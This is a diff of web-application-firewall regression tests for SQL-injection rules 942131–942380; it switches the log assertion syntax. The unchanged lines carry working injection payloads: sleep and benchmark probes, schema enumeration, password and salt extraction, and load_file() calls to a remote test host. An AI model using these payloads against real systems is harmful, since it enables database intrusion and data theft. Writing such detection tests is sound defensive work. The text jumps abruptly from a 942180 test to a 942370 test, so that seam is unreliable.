b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml index 7d5c7de4d..37712c37d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?a=11!=1" version: HTTP/1.1 output: - log_contains: id "942131" + log: + expect_ids: [942131] - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: 
@@ -31,7 +32,8 @@ tests: uri: "/get?a=1!=11" version: HTTP/1.1 output: - log_contains: id "942131" + log: + expect_ids: [942131] - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -45,7 +47,8 @@ tests: uri: "/get?a=11!=11" version: HTTP/1.1 output: - no_log_contains: id "942131" + log: + no_expect_ids: [942131] - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -59,7 +62,8 @@ tests: uri: "/get?a=1%20is%20not%202" version: HTTP/1.1 output: - log_contains: id "942131" + log: + expect_ids: [942131] - test_id: 5 desc: "SQL Injection Attack: SQL Tautology negative" stages: @@ -73,7 +77,8 @@ tests: uri: "/get?a=1%20is%20not%201" version: HTTP/1.1 output: - no_log_contains: id "942131" + log: + no_expect_ids: [942131] - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -88,7 +93,8 @@ tests: data: "a='1' not regexp '2'" version: HTTP/1.1 output: - log_contains: id "942131" + log: + expect_ids: [942131] - test_id: 7 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -103,4 +109,5 @@ tests: data: "a='1' not regexp '1'" version: HTTP/1.1 output: - no_log_contains: id "942131" + log: + no_expect_ids: [942131] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index d839c8ee4..03dad9402 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?sql_table=pg_catalog" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -33,7 +34,8 @@ tests: data: "INFORMATION_SCHEMA" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: 
@@ -49,7 +51,8 @@ tests: data: "database(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -65,7 +68,8 @@ tests: data: "db_name(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -81,7 +85,8 @@ tests: data: "DaTaBasE(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -97,7 +102,8 @@ tests: data: "InFoRmaTioN_ScHemA" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -113,7 +119,8 @@ tests: data: "DB_NAME(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -129,7 +136,8 @@ tests: data: "tempdb" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -145,7 +153,8 @@ tests: data: "msdb" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 10 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -161,7 +170,8 @@ tests: data: "mysql.db" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 11 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -177,7 +187,8 @@ tests: data: "MSysAccessObjects" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 12 desc: "SQL Injection Attack: Common DB Names Detected" stages: 
@@ -193,7 +204,8 @@ tests: data: "Northwind" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 13 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -209,7 +221,8 @@ tests: data: "northwind" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 14 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -225,7 +238,8 @@ tests: data: "SCHEMA_NAME" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 15 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -241,7 +255,8 @@ tests: data: "DATABASE(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 16 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -257,7 +272,8 @@ tests: data: "schema_name" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 17 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -273,4 +289,5 @@ tests: data: "information_schema" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index 82e83cec0..9f3347554 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -19,7 +19,8 @@ tests: data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 2 desc: "Simple SQL injection" stages: @@ -35,7 +36,8 @@ tests: data: "var=1' and sleep(9) #" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 3 desc: "Simple SQL injection" stages: 
@@ -51,7 +53,8 @@ tests: data: "var=1(select*from(select(sleep(5)))d)" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 4 desc: "Advanced SQL injection" stages: @@ -67,7 +70,8 @@ tests: data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 5 stages: - input: @@ -82,7 +86,8 @@ tests: data: "var=test')and (select*from(select(sleep(10)))d)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 6 desc: "Simple SQL injection" stages: @@ -98,7 +103,8 @@ tests: data: "var=config.ini' and sleep(91) #" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 7 desc: "Simple SQL injection" stages: @@ -114,7 +120,8 @@ tests: data: "var=None')and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 8 desc: "Advanced SQL injection" stages: @@ -130,7 +137,8 @@ tests: data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 9 desc: "Simple injection" stages: @@ -146,7 +154,8 @@ tests: data: "var=file:/init.ini'.sleep(12).'" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 10 desc: "Advanced SQL injection" stages: @@ -162,7 +171,8 @@ tests: data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 11 desc: "Advanced SQL injection" stages: 
@@ -178,7 +188,8 @@ tests: data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 12 desc: "Simple injection" stages: @@ -194,7 +205,8 @@ tests: data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 13 desc: "Simple injection" stages: @@ -210,7 +222,8 @@ tests: data: "var=test{${sleep(12)}}" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 14 desc: "Advanced injection" stages: @@ -226,7 +239,8 @@ tests: data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 15 desc: "Advanced injection" stages: @@ -242,7 +256,8 @@ tests: data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 16 desc: "Simple injection" stages: @@ -258,7 +273,8 @@ tests: data: "var=\\foobar.txt\" or sleep(4) #" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 17 desc: "SQLite 'json' function" stages: @@ -274,7 +290,8 @@ tests: data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 18 desc: "SQLite 'json_valid' function" stages: @@ -290,7 +307,8 @@ tests: data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 19 desc: "SQLite 'glob' function" stages: 
@@ -306,4 +324,5 @@ tests: data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml index baff15efd..cd940dd78 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml @@ -19,7 +19,8 @@ tests: data: "var=foo'||(select extractvalue(xmltype('%tocob;" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 2 desc: "Simple SQL injection" stages: @@ -35,7 +36,8 @@ tests: data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 3 desc: "Advanced SQL injection" stages: @@ -51,7 +53,8 @@ tests: data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: @@ -67,7 +70,8 @@ tests: data: "var=, FIND_IN_SET('22', Category )" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: @@ -83,7 +87,8 @@ tests: data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: 
@@ -99,7 +104,8 @@ tests: data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: @@ -115,7 +121,8 @@ tests: data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 8 desc: "SQL injection using PostgreSQL starts_with() function" stages: @@ -130,7 +137,8 @@ tests: uri: "/get/index.php?id=starts_with(password,'a')::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: @@ -145,7 +153,8 @@ tests: uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 10 desc: "SQL injection using PostgreSQL json_build_object() function" stages: @@ -160,7 +169,8 @@ tests: uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 11 desc: "SQL injection using unistr() function" stages: @@ -175,4 +185,5 @@ tests: uri: "/get/index.php?id=unistr(password)::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml index 2d6ce1b1e..80057834e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml 
@@ -18,7 +18,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942152" + log: + expect_ids: [942152] - test_id: 2 desc: "SQL injection in request header User-Agent" stages: @@ -33,7 +34,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942152" + log: + expect_ids: [942152] - test_id: 3 desc: "SQL injection in request header User-Agent" stages: @@ -48,4 +50,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942152" + log: + expect_ids: [942152] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index b499f63f2..fb27be346 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?sql_table=sleep%28534543%29" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -33,7 +34,8 @@ tests: data: "sleEP(3)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -49,7 +51,8 @@ tests: data: "sleep(5000)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -65,7 +68,8 @@ tests: data: "BENChmARk(2999/**/999,Md5(NoW()" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -81,7 +85,8 @@ tests: data: "BEncHMARk(2999999,Md5(NoW('')" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: 
@@ -97,7 +102,8 @@ tests: data: "BENCHMARK(5000000,MD5(0x48416166)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -113,7 +119,8 @@ tests: data: "benchmark(3000000,M%445(4)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -129,7 +136,8 @@ tests: data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -145,7 +153,8 @@ tests: data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 10 desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" stages: @@ -160,4 +169,5 @@ tests: uri: "/get/if(now()=sysdate(),sleep(12),0)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 63b5b547e..114ff39c9 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" version: HTTP/1.0 output: - log_contains: id "942170" + log: + expect_ids: [942170] - test_id: 2 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" stages: 
@@ -32,7 +33,8 @@ tests: uri: "/get?var=%3B%20sleep%280%29" version: HTTP/1.0 output: - log_contains: id "942170" + log: + expect_ids: [942170] - test_id: 3 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" stages: @@ -47,7 +49,8 @@ tests: uri: "/get?var=I%20sleep%20well%21" version: HTTP/1.0 output: - no_log_contains: id "942170" + log: + no_expect_ids: [942170] - test_id: 4 desc: "Status Page Test - SQL injection test with select if(x" stages: @@ -62,4 +65,5 @@ tests: uri: "/get?test=select+if(x" version: HTTP/1.0 output: - log_contains: id "942170" + log: + expect_ids: [942170] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index aba2a2cdc..5969385cb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?var=3%27%20%27%201" version: HTTP/1.0 output: - log_contains: id "942180" + log: + expect_ids: [942180] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,7 +35,8 @@ tests: version: HTTP/1.0 data: "javascript:\"/*'/*`/*-->%+-][\w-]+[^\w\s]+[\"'`][^,] @@ -170,7 +178,8 @@ tests: data: "var=>foo##'." version: HTTP/1.0 output: - log_contains: id "942370" + log: + expect_ids: [942370] - test_id: 10 stages: - input: @@ -184,7 +193,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942370" + log: + expect_ids: [942370] - test_id: 11 desc: encode(lo_get(16400),'base64')::int stages: @@ -199,4 +209,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942370" + log: + expect_ids: [942370] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index f28a16c3d..ee0cf1b02 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -18,7 +18,8 @@ tests: data: "from `db_miwf`.`sys_refindex` limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -34,7 +35,8 @@ tests: data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 3 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: data: "from `information_schema`.tables limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 4 desc: "SQL Injection Attack" stages: @@ -66,7 +69,8 @@ tests: data: "ORder by" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 5 desc: "SQL Injection Attack" stages: @@ -82,7 +86,8 @@ tests: data: "ordeR by" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 6 desc: "SQL Injection Attack" stages: @@ -98,7 +103,8 @@ tests: data: "SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 7 desc: "SQL Injection Attack" stages: @@ -114,7 +120,8 @@ tests: data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 8 desc: "SQL Injection Attack" stages: @@ -130,7 +137,8 @@ tests: data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 9 desc: "SQL Injection Attack" stages: 
@@ -146,7 +154,8 @@ tests: data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 10 desc: "SQL Injection Attack" stages: @@ -162,7 +171,8 @@ tests: data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 11 desc: "SQL Injection Attack" stages: @@ -178,7 +188,8 @@ tests: data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 12 desc: "SQL Injection Attack" stages: @@ -194,7 +205,8 @@ tests: data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 13 desc: "SQL Injection Attack" stages: @@ -210,7 +222,8 @@ tests: data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 14 desc: "SQL Injection Attack" stages: @@ -226,7 +239,8 @@ tests: data: "SELECT 'qzxjq'||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 15 desc: "SQL Injection Attack" stages: @@ -242,7 +256,8 @@ tests: data: "execute php" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 16 desc: "SQL Injection Attack" stages: @@ -258,7 +273,8 @@ tests: data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 17 desc: "SQL Injection Attack" stages: 
@@ -274,7 +290,8 @@ tests: data: "Execute(" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 18 desc: "SQL Injection Attack" stages: @@ -290,7 +307,8 @@ tests: data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 19 desc: "SQL Injection Attack" stages: @@ -306,7 +324,8 @@ tests: data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 20 desc: "SQL Injection Attack" stages: @@ -322,7 +341,8 @@ tests: data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 21 desc: "SQL Injection Attack" stages: @@ -338,7 +358,8 @@ tests: data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 22 desc: "SQL Injection Attack" stages: @@ -354,7 +375,8 @@ tests: data: "HAVING+1%3D" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 23 desc: "SQL Injection Attack" stages: @@ -370,7 +392,8 @@ tests: data: "execute+elysi" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 24 desc: "SQL Injection Attack" stages: 
@@ -386,7 +409,8 @@ tests: data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 25 desc: "SQL Injection Attack" stages: @@ -402,7 +426,8 @@ tests: data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 26 desc: "SQL Injection Attack" stages: @@ -418,7 +443,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 27 desc: "SQL Injection Attack" stages: @@ -434,7 +460,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 28 desc: "SQL Injection Attack" stages: @@ -450,7 +477,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 29 desc: "SQL Injection Attack" stages: @@ -466,7 +494,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 30 desc: "SQL Injection Attack" stages: @@ -482,7 +511,8 @@ tests: data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 31 desc: "SQL Injection Attack" stages: 
@@ -498,7 +528,8 @@ tests: data: "execute node_" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 32 desc: "SQL Injection Attack" stages: @@ -514,7 +545,8 @@ tests: data: "execute scald" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 33 desc: "SQL Injection Attack" stages: @@ -530,7 +562,8 @@ tests: data: "execute system" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 34 desc: "SQL Injection Attack" stages: @@ -546,7 +579,8 @@ tests: data: "execute user_" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 35 desc: "SQL Injection Attack" stages: @@ -562,7 +596,8 @@ tests: data: "execute views" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 36 desc: "SQL Injection Attack" stages: @@ -578,7 +613,8 @@ tests: data: "execute patha" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 37 desc: "SQL Injection Attack" stages: @@ -594,7 +630,8 @@ tests: data: "execute workb" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 38 desc: "SQL Injection Attack" stages: @@ -610,7 +647,8 @@ tests: data: "execute panel" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 39 desc: "SQL Injection Attack" stages: @@ -626,7 +664,8 @@ tests: data: "pay=from+information_schema.tables+where+1%3D2+limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 40 desc: "SQL Injection Attack" stages: 
